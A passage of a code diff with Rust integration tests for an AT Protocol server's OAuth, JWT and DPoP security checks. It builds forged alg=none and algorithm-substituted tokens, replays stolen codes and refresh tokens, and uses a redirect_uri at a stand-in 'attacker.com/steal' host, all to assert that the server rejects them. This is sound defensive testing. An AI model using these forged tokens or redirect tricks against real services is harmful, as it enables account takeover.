"did:plc:attacker", "aud": "https://test.pds", 94 + "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" }); 95 + let none_token = format!("{}.{}.", URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()), 96 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap())); 97 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 98 + .bearer_auth(&none_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "alg=none should be rejected"); 99 + let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" }); 100 + let rs256_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()), 101 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 64])); 102 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 103 + .bearer_auth(&rs256_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Algorithm substitution should be rejected"); 104 + let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds", 105 + "iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" }); 106 + let expired_token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()), 107 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 108 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 109 + .bearer_auth(&expired_token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected"); 110 } 111 112 #[tokio::test] 113 + async fn test_pkce_security() { 114 let url = base_url().await; 115 let http_client = client(); 116 + let redirect_uri = "https://example.com/pkce-callback"; 117 let mock_client = setup_mock_client_metadata(redirect_uri).await; 118 let client_id = mock_client.uri(); 119 + let res = http_client.post(format!("{}/oauth/par", url)) 120 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 121 + ("code_challenge", "plain-text-challenge"), ("code_challenge_method", "plain")]) 122 + .send().await.unwrap(); 123 + assert_eq!(res.status(), StatusCode::BAD_REQUEST, "PKCE plain method should be rejected"); 124 let body: Value = res.json().await.unwrap(); 125 + assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("s256")); 126 + let res = http_client.post(format!("{}/oauth/par", url)) 127 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri)]) 128 + .send().await.unwrap(); 129 + assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected"); 130 let ts = Utc::now().timestamp_millis(); 131 let handle = format!("pkce-attack-{}", ts); 132 + http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 133 + .json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "pkce-password" })) 134 + .send().await.unwrap(); 135 let (_, code_challenge) = generate_pkce(); 136 let (attacker_verifier, _) = generate_pkce(); 137 + let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 138 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 139 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 140 + .send().await.unwrap().json().await.unwrap(); 141 let request_uri = par_body["request_uri"].as_str().unwrap(); 142 let auth_client = no_redirect_client(); 143 + let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 144 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", "pkce-password"), ("remember_device", "false")]) 145 + .send().await.unwrap(); 146 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 147 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 148 + let token_res = http_client.post(format!("{}/oauth/token", url)) 149 + .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 150 + ("code_verifier", &attacker_verifier), ("client_id", &client_id)]) 151 + .send().await.unwrap(); 152 + assert_eq!(token_res.status(), StatusCode::BAD_REQUEST, "Wrong PKCE verifier should be rejected"); 153 } 154 155 #[tokio::test] 156 + async fn test_replay_attacks() { 157 let url = base_url().await; 158 let http_client = client(); 159 let ts = Utc::now().timestamp_millis(); 160 + let handle = format!("replay-{}", ts); 161 + http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 162 + .json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "replay-password" })) 163 + .send().await.unwrap(); 164 + let redirect_uri = "https://example.com/replay-callback"; 165 let mock_client = setup_mock_client_metadata(redirect_uri).await; 166 let client_id = mock_client.uri(); 167 let (code_verifier, code_challenge) = generate_pkce(); 168 + let par_body: Value = http_client.post(format!("{}/oauth/par", url)) 169 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 170 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 171 + .send().await.unwrap().json().await.unwrap(); 172 let request_uri = par_body["request_uri"].as_str().unwrap(); 173 let auth_client = no_redirect_client(); 174 + let auth_res = auth_client.post(format!("{}/oauth/authorize", url)) 175 + .form(&[("request_uri", request_uri), ("username", &handle), ("password", "replay-password"), ("remember_device", "false")]) 176 + .send().await.unwrap(); 177 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 178 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap().to_string(); 179 + let first = http_client.post(format!("{}/oauth/token", url)) 180 + .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 181 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 182 + .send().await.unwrap(); 183 + assert_eq!(first.status(), StatusCode::OK, "First use should succeed"); 184 + let first_body: Value = first.json().await.unwrap(); 185 + let replay = http_client.post(format!("{}/oauth/token", url)) 186 + .form(&[("grant_type", "authorization_code"), ("code", &code), ("redirect_uri", redirect_uri), 187 + ("code_verifier", &code_verifier), ("client_id", &client_id)]) 188 + .send().await.unwrap(); 189 + assert_eq!(replay.status(), StatusCode::BAD_REQUEST, "Auth code replay should fail"); 190 + let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string(); 191 + let first_refresh: Value = http_client.post(format!("{}/oauth/token", url)) 192 + .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 193 + .send().await.unwrap().json().await.unwrap(); 194 + assert!(first_refresh["access_token"].is_string(), "First refresh should succeed"); 195 + let new_rt = first_refresh["refresh_token"].as_str().unwrap(); 196 + let rt_replay = http_client.post(format!("{}/oauth/token", url)) 197 + .form(&[("grant_type", "refresh_token"), ("refresh_token", &stolen_rt), ("client_id", &client_id)]) 198 + .send().await.unwrap(); 199 + assert_eq!(rt_replay.status(), StatusCode::BAD_REQUEST, "Refresh token replay should fail"); 200 + let body: Value = rt_replay.json().await.unwrap(); 201 + assert!(body["error_description"].as_str().unwrap().to_lowercase().contains("reuse")); 202 + let family_revoked = http_client.post(format!("{}/oauth/token", url)) 203 + .form(&[("grant_type", "refresh_token"), ("refresh_token", new_rt), ("client_id", &client_id)]) 204 + .send().await.unwrap(); 205 + assert_eq!(family_revoked.status(), StatusCode::BAD_REQUEST, "Token family should be revoked"); 206 } 207 208 #[tokio::test] 209 + async fn test_oauth_security_boundaries() { 210 let url = base_url().await; 211 let http_client = client(); 212 let registered_redirect = "https://legitimate-app.com/callback"; 213 let mock_client = setup_mock_client_metadata(registered_redirect).await; 214 let client_id = mock_client.uri(); 215 let (_, code_challenge) = generate_pkce(); 216 + let res = http_client.post(format!("{}/oauth/par", url)) 217 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", "https://attacker.com/steal"), 218 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 219 + .send().await.unwrap(); 220 + assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected"); 221 let ts = Utc::now().timestamp_millis(); 222 + let handle = format!("deact-{}", ts); 223 + let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 224 + .json(&json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "deact-password" })) 225 + .send().await.unwrap(); 226 let account: Value = create_res.json().await.unwrap(); 227 + let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 228 + http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 229 + .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 230 + let deact_par: Value = http_client.post(format!("{}/oauth/par", url)) 231 + .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", registered_redirect), 232 + ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 233 + .send().await.unwrap().json().await.unwrap(); 234 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 235 .header("Accept", "application/json") 236 + .form(&[("request_uri", deact_par["request_uri"].as_str().unwrap()), ("username", &handle), ("password", "deact-password"), ("remember_device", "false")]) 237 + .send().await.unwrap(); 238 + assert_eq!(auth_res.status(), StatusCode::FORBIDDEN, "Deactivated account should be blocked"); 239 + let redirect_uri_a = "https://app-a.com/callback"; 240 + let mock_a = setup_mock_client_metadata(redirect_uri_a).await; 241 + let client_id_a = mock_a.uri(); 242 + let mock_b = setup_mock_client_metadata("https://app-b.com/callback").await; 243 + let client_id_b = mock_b.uri(); 244 + let ts2 = Utc::now().timestamp_millis(); 245 + let handle2 = format!("cross-{}", ts2); 246 + http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 247 + .json(&json!({ "handle": handle2, "email": format!("{}@example.com", handle2), "password": "cross-password" })) 248 + .send().await.unwrap(); 249 + let (code_verifier2, code_challenge2) = generate_pkce(); 250 + let par_a: Value = http_client.post(format!("{}/oauth/par", url)) 251 + .form(&[("response_type", "code"), ("client_id", &client_id_a), ("redirect_uri", redirect_uri_a), 252 + ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 253 + .send().await.unwrap().json().await.unwrap(); 254 + let auth_client = no_redirect_client(); 255 + let auth_a = auth_client.post(format!("{}/oauth/authorize", url)) 256 + .form(&[("request_uri", par_a["request_uri"].as_str().unwrap()), ("username", &handle2), ("password", "cross-password"), ("remember_device", "false")]) 257 + .send().await.unwrap(); 258 + let loc_a = auth_a.headers().get("location").unwrap().to_str().unwrap(); 259 + let code_a = loc_a.split("code=").nth(1).unwrap().split('&').next().unwrap(); 260 + let cross_client = http_client.post(format!("{}/oauth/token", url)) 261 + .form(&[("grant_type", "authorization_code"), ("code", code_a), ("redirect_uri", redirect_uri_a), 262 + ("code_verifier", &code_verifier2), ("client_id", &client_id_b)]) 263 + .send().await.unwrap(); 264 + assert_eq!(cross_client.status(), StatusCode::BAD_REQUEST, "Cross-client code exchange must be rejected"); 265 } 266 267 #[tokio::test] 268 + async fn test_malformed_tokens_and_headers() { 269 let url = base_url().await; 270 let http_client = client(); 271 + let malformed = vec!["", "not-a-token", "one.two", "one.two.three.four", "....", "eyJhbGciOiJIUzI1NiJ9", 272 + "eyJhbGciOiJIUzI1NiJ9.", "eyJhbGciOiJIUzI1NiJ9..", ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid!!.eyJ9.sig"]; 273 + for token in &malformed { 274 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 275 + .bearer_auth(token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 276 + } 277 + let wrong_types = vec!["JWT", "jwt", "at+JWT", ""]; 278 + for typ in wrong_types { 279 + let header = json!({ "alg": "HS256", "typ": typ }); 280 + let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" }); 281 + let token = format!("{}.{}.{}", URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()), 282 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), URL_SAFE_NO_PAD.encode(&[1u8; 32])); 283 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 284 + .bearer_auth(&token).send().await.unwrap().status(), StatusCode::UNAUTHORIZED, "typ='{}' should be rejected", typ); 285 + } 286 + let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 287 + let invalid_formats = vec![format!("Basic {}", access_token), format!("Digest {}", access_token), 288 + access_token.clone(), format!("Bearer{}", access_token)]; 289 + for auth in &invalid_formats { 290 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 291 + .header("Authorization", auth).send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 292 + } 293 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 294 + .send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 295 + assert_eq!(http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 296 + .header("Authorization", "").send().await.unwrap().status(), StatusCode::UNAUTHORIZED); 297 + let grants = vec!["client_credentials", "password", "implicit", "", "AUTHORIZATION_CODE"]; 298 + for grant in grants { 299 + assert_eq!(http_client.post(format!("{}/oauth/token", url)) 300 + .form(&[("grant_type", grant), ("client_id", "https://example.com")]) 301 + .send().await.unwrap().status(), StatusCode::BAD_REQUEST, "Grant '{}' should be rejected", grant); 302 + } 303 } 304 305 #[tokio::test] 306 + async fn test_token_revocation() { 307 let url = base_url().await; 308 let http_client = client(); 309 + let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await; 310 + assert_eq!(http_client.post(format!("{}/oauth/revoke", url)) 311 + .form(&[("token", &refresh_token)]).send().await.unwrap().status(), StatusCode::OK); 312 + let introspect: Value = http_client.post(format!("{}/oauth/introspect", url)) 313 + .form(&[("token", &access_token)]).send().await.unwrap().json().await.unwrap(); 314 + assert_eq!(introspect["active"], false, "Revoked token should be inactive"); 315 } 316 317 + fn create_dpop_proof(method: &str, uri: &str, _nonce: Option<&str>, ath: Option<&str>, iat_offset: i64) -> String { 318 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 319 use p256::elliptic_curve::sec1::ToEncodedPoint; 320 let signing_key = SigningKey::random(&mut rand::thread_rng()); 321 + let point = signing_key.verifying_key().to_encoded_point(false); 322 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 323 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 324 + let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 325 + let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 326 + "htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset }); 327 + if let Some(a) = ath { payload["ath"] = json!(a); } 328 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 329 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 330 let signing_input = format!("{}.{}", header_b64, payload_b64); 331 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 332 + format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())) 333 } 334 335 #[test] 336 + fn test_dpop_nonce_security() { 337 + let secret1 = b"test-dpop-secret-32-bytes-long!!"; 338 + let secret2 = b"different-secret-32-bytes-long!!"; 339 + let v1 = DPoPVerifier::new(secret1); 340 + let v2 = DPoPVerifier::new(secret2); 341 + let nonce = v1.generate_nonce(); 342 + assert!(!nonce.is_empty()); 343 + assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass"); 344 + assert!(v2.validate_nonce(&nonce).is_err(), "Nonce from different secret should fail"); 345 + let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap(); 346 + let mut tampered = nonce_bytes.clone(); 347 + if !tampered.is_empty() { tampered[0] ^= 0xFF; } 348 + assert!(v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)).is_err(), "Tampered nonce should fail"); 349 + assert!(v1.validate_nonce("invalid").is_err()); 350 + assert!(v1.validate_nonce("").is_err()); 351 + assert!(v1.validate_nonce("!!!not-base64!!!").is_err()); 352 + } 353 + 354 + #[test] 355 + fn test_dpop_proof_validation() { 356 + let secret = b"test-dpop-secret-32-bytes-long!!"; 357 + let verifier = DPoPVerifier::new(secret); 358 + assert!(verifier.verify_proof("not.enough", "POST", "https://example.com", None).is_err()); 359 + assert!(verifier.verify_proof("invalid", "POST", "https://example.com", None).is_err()); 360 + let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 361 + assert!(verifier.verify_proof(&proof, "GET", "https://example.com/token", None).is_err(), "Method mismatch"); 362 + assert!(verifier.verify_proof(&proof, "POST", "https://other.com/token", None).is_err(), "URI mismatch"); 363 + assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None).is_ok(), "Query params should be ignored"); 364 + let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600); 365 + assert!(verifier.verify_proof(&old_proof, "POST", "https://example.com/token", None).is_err(), "iat too old"); 366 + let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600); 367 + assert!(verifier.verify_proof(&future_proof, "POST", "https://example.com/token", None).is_err(), "iat in future"); 368 + let ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, Some("wrong"), 0); 369 + assert!(verifier.verify_proof(&ath_proof, "GET", "https://example.com/resource", Some("correct")).is_err(), "ath mismatch"); 370 + let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0); 371 + assert!(verifier.verify_proof(&no_ath_proof, "GET", "https://example.com/resource", Some("expected")).is_err(), "Missing ath"); 372 + } 373 + 374 + #[test] 375 + fn test_dpop_proof_signature_attacks() { 376 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 377 use p256::elliptic_curve::sec1::ToEncodedPoint; 378 let secret = b"test-dpop-secret-32-bytes-long!!"; 379 let verifier = DPoPVerifier::new(secret); 380 let signing_key = SigningKey::random(&mut rand::thread_rng()); 381 let attacker_key = SigningKey::random(&mut rand::thread_rng()); 382 + let attacker_point = attacker_key.verifying_key().to_encoded_point(false); 383 let x = URL_SAFE_NO_PAD.encode(attacker_point.x().unwrap()); 384 let y = URL_SAFE_NO_PAD.encode(attacker_point.y().unwrap()); 385 + let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 386 + let payload = json!({ "jti": format!("key-sub-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 387 + "htm": "POST", "htu": "https://example.com/token", "iat": Utc::now().timestamp() }); 388 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 389 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 390 let signing_input = format!("{}.{}", header_b64, payload_b64); 391 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 392 + let mismatched = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 393 + assert!(verifier.verify_proof(&mismatched, "POST", "https://example.com/token", None).is_err(), "Mismatched key should fail"); 394 + let point = signing_key.verifying_key().to_encoded_point(false); 395 + let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", 396 + "x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } }); 397 + let good_header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&good_header).unwrap()); 398 + let good_input = format!("{}.{}", good_header_b64, payload_b64); 399 + let good_sig: Signature = signing_key.sign(good_input.as_bytes()); 400 + let mut sig_bytes = good_sig.to_bytes().to_vec(); 401 + sig_bytes[0] ^= 0xFF; 402 + let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes)); 403 + assert!(verifier.verify_proof(&tampered, "POST", "https://example.com/token", None).is_err(), "Tampered sig should fail"); 404 } 405 406 #[test] 407 + fn test_jwk_thumbprint() { 408 + let jwk = DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), 409 x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 410 + y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()) }; 411 + let tp1 = compute_jwk_thumbprint(&jwk).unwrap(); 412 + let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 413 + assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 414 + assert!(!tp1.is_empty()); 415 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("secp256k1".to_string()), 416 + x: Some("x".to_string()), y: Some("y".to_string()) }).is_ok()); 417 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "OKP".to_string(), crv: Some("Ed25519".to_string()), 418 + x: Some("x".to_string()), y: None }).is_ok()); 419 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: None, x: Some("x".to_string()), y: Some("y".to_string()) }).is_err()); 420 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: None, y: Some("y".to_string()) }).is_err()); 421 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "EC".to_string(), crv: Some("P-256".to_string()), x: Some("x".to_string()), y: None }).is_err()); 422 + assert!(compute_jwk_thumbprint(&DPoPJwk { kty: "RSA".to_string(), crv: None, x: None, y: None }).is_err()); 423 } 424 425 #[test] 426 + fn test_dpop_clock_skew() { 427 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 428 use p256::elliptic_curve::sec1::ToEncodedPoint; 429 let secret = b"test-dpop-secret-32-bytes-long!!"; 430 let verifier = DPoPVerifier::new(secret); 431 + let test_cases = vec![(-600, true), (-301, true), (-299, false), (0, false), (299, false), (301, true), (600, true)]; 432 + for (offset, should_fail) in test_cases { 433 let signing_key = SigningKey::random(&mut rand::thread_rng()); 434 + let point = signing_key.verifying_key().to_encoded_point(false); 435 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 436 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 437 + let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 438 + let payload = json!({ "jti": format!("clock-{}-{}", offset, Utc::now().timestamp_nanos_opt().unwrap_or(0)), 439 + "htm": "POST", "htu": "https://example.com/token", "iat": Utc::now().timestamp() + offset }); 440 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 441 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 442 let signing_input = format!("{}.{}", header_b64, payload_b64); 443 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 444 + let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 445 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 446 + if should_fail { assert!(result.is_err(), "offset {} should fail", offset); } 447 + else { assert!(result.is_ok(), "offset {} should pass", offset); } 448 } 449 } 450 451 #[test] 452 + fn test_dpop_http_method_case() { 453 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 454 use p256::elliptic_curve::sec1::ToEncodedPoint; 455 let secret = b"test-dpop-secret-32-bytes-long!!"; 456 let verifier = DPoPVerifier::new(secret); 457 let signing_key = SigningKey::random(&mut rand::thread_rng()); 458 + let point = signing_key.verifying_key().to_encoded_point(false); 459 let x = URL_SAFE_NO_PAD.encode(point.x().unwrap()); 460 let y = URL_SAFE_NO_PAD.encode(point.y().unwrap()); 461 + let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 462 + let payload = json!({ "jti": format!("case-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 463 + "htm": "post", "htu": "https://example.com/token", "iat": Utc::now().timestamp() }); 464 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 465 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 466 let signing_input = format!("{}.{}", header_b64, payload_b64); 467 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 468 + let proof = format!("{}.{}", signing_input, URL_SAFE_NO_PAD.encode(signature.to_bytes())); 469 + assert!(verifier.verify_proof(&proof, "POST", "https://example.com/token", None).is_ok(), "HTTP method should be case-insensitive"); 470 }
+83 -410
tests/plc_operations.rs
··· 5 use sqlx::PgPool; 6 7 #[tokio::test] 8 - async fn test_request_plc_operation_signature_requires_auth() { 9 let client = client(); 10 - let res = client 11 - .post(format!( 12 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 13 - base_url().await 14 - )) 15 - .send() 16 - .await 17 - .expect("Request failed"); 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 - } 20 - 21 - #[tokio::test] 22 - async fn test_request_plc_operation_signature_success() { 23 - let client = client(); 24 - let (token, _did) = create_account_and_login(&client).await; 25 - let res = client 26 - .post(format!( 27 - "{}/xrpc/com.atproto.identity.requestPlcOperationSignature", 28 - base_url().await 29 - )) 30 - .bearer_auth(&token) 31 - .send() 32 - .await 33 - .expect("Request failed"); 34 - assert_eq!(res.status(), StatusCode::OK); 35 - } 36 - 37 - #[tokio::test] 38 - async fn test_sign_plc_operation_requires_auth() { 39 - let client = client(); 40 - let res = client 41 - .post(format!( 42 - "{}/xrpc/com.atproto.identity.signPlcOperation", 43 - base_url().await 44 - )) 45 - .json(&json!({})) 46 - .send() 47 - .await 48 - .expect("Request failed"); 49 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 50 } 51 52 #[tokio::test] 53 - async fn test_sign_plc_operation_requires_token() { 54 let client = client(); 55 - let (token, _did) = create_account_and_login(&client).await; 56 - let res = client 57 - .post(format!( 58 - "{}/xrpc/com.atproto.identity.signPlcOperation", 59 - base_url().await 60 - )) 61 - .bearer_auth(&token) 62 - .json(&json!({})) 63 - .send() 64 - .await 65 - .expect("Request failed"); 66 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 67 let body: serde_json::Value = res.json().await.unwrap(); 68 assert_eq!(body["error"], "InvalidRequest"); 69 - } 70 - 71 - #[tokio::test] 72 - async fn test_sign_plc_operation_invalid_token() { 73 - let client = client(); 74 - let (token, _did) = create_account_and_login(&client).await; 75 - let res = client 76 - .post(format!( 77 - "{}/xrpc/com.atproto.identity.signPlcOperation", 78 - base_url().await 79 - )) 80 - .bearer_auth(&token) 81 - .json(&json!({ 82 - "token": "invalid-token-12345" 83 - })) 84 - .send() 85 - .await 86 - .expect("Request failed"); 87 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 88 let body: serde_json::Value = res.json().await.unwrap(); 89 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); 90 } 91 92 #[tokio::test] 93 - async fn test_submit_plc_operation_requires_auth() { 94 - let client = client(); 95 - let res = client 96 - .post(format!( 97 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 98 - base_url().await 99 - )) 100 - .json(&json!({ 101 - "operation": {} 102 - })) 103 - .send() 104 - .await 105 - .expect("Request failed"); 106 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 107 - } 108 - 109 - #[tokio::test] 110 - async fn test_submit_plc_operation_invalid_operation() { 111 let client = client(); 112 - let (token, _did) = create_account_and_login(&client).await; 113 - let res = client 114 - .post(format!( 115 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 116 - base_url().await 117 - )) 118 - .bearer_auth(&token) 119 - .json(&json!({ 120 - "operation": { 121 - "type": "invalid_type" 122 - } 123 - })) 124 - .send() 125 - .await 126 - .expect("Request failed"); 127 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 128 let body: serde_json::Value = res.json().await.unwrap(); 129 assert_eq!(body["error"], "InvalidRequest"); 130 - } 131 - 132 - #[tokio::test] 133 - async fn test_submit_plc_operation_missing_sig() { 134 - let client = client(); 135 - let (token, _did) = create_account_and_login(&client).await; 136 - let res = client 137 - .post(format!( 138 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 139 - base_url().await 140 - )) 141 - .bearer_auth(&token) 142 - .json(&json!({ 143 - "operation": { 144 - "type": "plc_operation", 145 - "rotationKeys": [], 146 - "verificationMethods": {}, 147 - "alsoKnownAs": [], 148 - "services": {}, 149 - "prev": null 150 - } 151 - })) 152 - .send() 153 - .await 154 - .expect("Request failed"); 155 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 156 let body: serde_json::Value = res.json().await.unwrap(); 157 assert_eq!(body["error"], "InvalidRequest"); 158 - } 159 - 160 - #[tokio::test] 161 - async fn test_submit_plc_operation_wrong_service_endpoint() { 162 - let client = client(); 163 - let (token, _did) = create_account_and_login(&client).await; 164 - let res = client 165 - .post(format!( 166 - "{}/xrpc/com.atproto.identity.submitPlcOperation", 167 - base_url().await 168 - )) 169 - .bearer_auth(&token) 170 - .json(&json!({ 171 - "operation": { 172 - "type": "plc_operation", 173 - "rotationKeys": ["did:key:z123"], 174 - "verificationMethods": {"atproto": "did:key:z456"}, 175 - "alsoKnownAs": ["at://wrong.handle"], 176 - "services": { 177 - "atproto_pds": { 178 - "type": "AtprotoPersonalDataServer", 179 - "endpoint": "https://wrong.example.com" 180 - } 181 - }, 182 - "prev": null, 183 - "sig": "fake_signature" 184 - } 185 - })) 186 - .send() 187 - .await 188 - .expect("Request failed"); 189 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 190 } 191 192 